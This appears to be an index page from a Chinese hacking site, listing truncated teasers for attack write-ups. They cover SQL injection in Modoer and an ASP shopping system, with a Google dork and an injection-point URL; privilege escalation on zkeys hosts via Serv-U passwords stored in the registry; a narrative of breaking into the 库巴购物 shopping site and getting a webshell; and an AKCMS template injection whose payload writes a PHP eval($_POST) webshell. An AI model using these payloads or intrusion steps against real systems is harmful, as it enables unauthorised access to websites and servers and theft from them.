-
Modoer 点评系统注射 几个版本通杀
不给力的注射, 搞某站挖的, 查了下没什么大站用这个 影响不大 发出来大家交流学习, 废话不多说, 看我们的猪肉点~~~~~首先\core\modules\item\ajax.php开始调用~$do = trim($_GET['do']);...
-
zkysoft 主机提权方法
zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表。提供我成功过的几个方法(不一定有效):1、如果目标仅仅是旁站的话可以去注册表查 serv-u 的指定用户密码,注册表地址:HKEY_LOCA...
-
渗透库巴购物
先来几个跨站反弹的存储的google hack看到这个:体力活找到这个:BT下跑了下二级域名,尝试加/eweb/,直到找到一个域名能解析aspx,根据前面源码里爆出来的用户,密码登录,修改格式:获取webshell,发现几乎所有的数据库连接...
-
AKCMS注入及后台拿shell漏洞
模板中写入以下内 <{php}>fputs(fopen(“./0x80c.php”,”w”),”<?eval($_POST[0x80c]);?>&rdqu...
-
无忧购物系统ASP专业版注入漏洞
谷歌关键字:inurl:views.asp?hw_id=注入点:www.hack1990.com/views.asp?hw_id=512POST 注入漏洞...
